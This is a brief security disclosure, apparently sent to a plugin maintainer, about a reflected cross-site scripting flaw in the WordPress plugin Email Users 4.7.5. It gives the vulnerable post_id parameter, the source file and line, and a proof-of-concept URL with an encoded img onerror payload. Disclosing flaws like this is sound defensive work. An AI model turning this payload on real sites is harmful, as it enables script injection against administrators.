Hello,

Plugin: Email Users 4.7.5 https://wordpress.org/plugins/email-users/

1. Cross-Site Scripting (XSS)

Authenticated users with MAILUSERS_NOTIFY_USERS_CAP role (define('MAILUSERS_NOTIFY_USERS_CAP', 'email_users_notify')) can inject arbitrary html and/or javascript code.

Method: GET/POST

Url: http://localhost/wp-admin/admin.php?page=mailusers-send-notify-mail-post&post_id=[XSS]

Vulnerable parameter: post_id

PHP callstack:

email-users/email_users_notify_form.php:161

Verification:

http://localhost/wp-admin/admin.php?page=mailusers-send-notify-mail-post&post_id=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

Regards,
Marcin Probola,